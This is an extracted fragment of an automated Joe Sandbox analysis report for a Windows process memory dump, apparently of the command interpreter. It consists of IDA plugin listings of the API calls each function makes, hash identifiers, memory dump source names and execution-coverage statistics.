                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveNamePathTypeVolume
                                        • String ID:
                                        • API String ID: 1029679093-0
                                        • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                        • Instruction ID: 4edc39b6fa9ec2aee8f8d478ff6db73eae28b21aa05c728b76ea854f11a2de15
                                        • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                        • Instruction Fuzzy Hash: 37316B32709AC18AEB209F62D8953E8B7A5FB49B94F844035CF5D87748EF38D649C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                        • String ID:
                                        • API String ID: 2448200120-0
                                        • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                        • Instruction ID: de0cdfddb6c19985437f75d4ceec3254e72ccf41e471b1ce28bbb60f28e825b3
                                        • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                        • Instruction Fuzzy Hash: DA211C31B0CA468AE7147F12A40057DFAA1EB84BA1F854139DE7D47795EF3CE6418B20
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                        • Instruction ID: 97434cfea32ee6921b9a0b44e5cab515de7bddd2fd50f8df87412eadeadcd070
                                        • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                        • Instruction Fuzzy Hash: E421536170CB4186EE44AF52B914479F7A2EB89BE0B989230DF2E03755EE3CE5058720
                                        APIs
                                          • Part of subcall function 00007FF7CD493C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD493D0C
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D2F
                                          • Part of subcall function 00007FF7CD493C24: iswalpha.MSVCRT ref: 00007FF7CD493D4F
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D75
                                          • Part of subcall function 00007FF7CD493C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493DBF
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486ABF
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486AD3
                                          • Part of subcall function 00007FF7CD486B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B8B
                                          • Part of subcall function 00007FF7CD486B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B97
                                          • Part of subcall function 00007FF7CD486B84: RtlFreeHeap.NTDLL ref: 00007FF7CD486BAF
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B39
                                          • Part of subcall function 00007FF7CD486B30: RtlFreeHeap.NTDLL ref: 00007FF7CD486B4D
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B59
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486B03
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486B17
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                        • String ID:
                                        • API String ID: 3512109576-0
                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction ID: 7fe8b07715b12a3b8351a958f3a9b0fb77b3244cf8d78721bf89ea32230b32a1
                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction Fuzzy Hash: 94216061B0DA8286EB44AF6698142B8BBA1EB59B54F948035CF2E47355EE2C9546C320
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6D0
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6E7
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B701
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B715
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocSize
                                        • String ID:
                                        • API String ID: 2549470565-0
                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction ID: a3f1c9c1b5cbb9d0eebe271c596b3d5fa62c19b627716f346d4fd7b9c8465a63
                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction Fuzzy Hash: 4221EE25B0DB4296EE14AF55E444078FAA1FB89B90BC89431DF2E43754EF3CE645C720
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD01C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD033
                                        • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD06D
                                        • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CD49507A), ref: 00007FF7CD4AD07F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                        • String ID:
                                        • API String ID: 1033415088-0
                                        APIs
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485A2E
                                        • _open_osfhandle.MSVCRT ref: 00007FF7CD485A4F
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7CD48260D), ref: 00007FF7CD4A37AA
                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD4A37D2
                                        Similarity
                                        • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                        • String ID:
                                        • API String ID: 22757656-0
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56C5
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A56D9
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56FD
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A5711
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD49EE64
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD49EE78
                                        Similarity
                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                        • String ID:
                                        • API String ID: 2759988882-0
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID:
                                        • API String ID: 1606018815-0
                                        APIs
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                          • Part of subcall function 00007FF7CD48EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F000
                                          • Part of subcall function 00007FF7CD48EF40: wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F031
                                          • Part of subcall function 00007FF7CD48EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • longjmp.MSVCRT ref: 00007FF7CD49CCBC
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD49CCE0
                                        Similarity
                                        • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3282654869-1994581435
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7CD4A827A), ref: 00007FF7CD4B11DC
                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7CD4A827A), ref: 00007FF7CD4B1277
                                        Similarity
                                        • API ID: Heap$AllocProcessmemmovewcschr
                                        • String ID: &()[]{}^=;!%'+,`~
                                        • API String ID: 1135967885-381716982
                                        Similarity
                                        • API ID: memmovewcsncmp
                                        • String ID: 0123456789
                                        • API String ID: 3879766669-2793719750
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A97D0
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4A98D7
                                        Similarity
                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                        • String ID: Software\Classes
                                        • API String ID: 2714550308-1656466771
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AA0FC
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AA1FB
                                        Similarity
                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                        • String ID: Software\Classes
                                        • API String ID: 2714550308-1656466771
                                        Similarity
                                        • API ID: ConsoleTitle
                                        • String ID: -
                                        • API String ID: 3358957663-3695764949
                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction ID: c748e467075e0743f98b9e45d38919dffa59fb2bfa209dcdc71d09afd0d8500f
                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction Fuzzy Hash: E7316F21B0CA4286EA14BF12A804478EAA5BB89BF0F944135DF2E577D5FF3CE651C324
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpswscanf
                                        • String ID: :EOF
                                        • API String ID: 1534968528-551370653
                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction ID: e3983b0b46e150881e6b875a5e69506901cf1ef8294e1c2d5c2dc7b24bad2592
                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction Fuzzy Hash: 5B318E31B0CA4286EB64BF56B8406B8F6A6EF54B60FD44031DF6D46291FF2CEA41C760
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp
                                        • String ID: /-Y
                                        • API String ID: 1886669725-4274875248
                                        • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                        • Instruction ID: d29c0803212366d668018dbf19120bda719ed9ad94216b7284a1b26464bf4b8b
                                        • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                        • Instruction Fuzzy Hash: F3217166B0C75581EA10AF469848178F6A2BB54FE0F844035DFAC97794FF3CEA82D710
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3$3
                                        • API String ID: 0-2538865259
                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction ID: d01a1294a90a065e0ce05ce44228ea3a66c0576e4ddf5f2f6594be908194d599
                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction Fuzzy Hash: 49012331F0E5828AF354AF629884278FA60BB903B1FD84135CE2E815E1FF2D6685C761
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction ID: 978296a0645cc9082028aae0f707cabe213949a83b6708db2184f0fb3dfc7a9d
                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction Fuzzy Hash: 8A416832B0D64286EA14AF12E444579FBA6EF85BA1BC88034DF6E03750EF3DE641C760

                                        Execution Graph

                                        Execution Coverage:5.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:618
                                        Total number of Limit Nodes:22
                                        execution_graph: serialized node/edge list backing the interactive execution-graph widget (each node is a function start address with the APIs it calls, e.g. "7ff7cd498fe0 RtlCaptureContext RtlLookupFunctionEntry", "7ff7cd49442a CreateProcessW", "7ff7cd494596 CreateProcessAsUserW"; edges are written as "caller->callee" node IDs). The raw dump is truncated in this extraction and is not reproduced here.
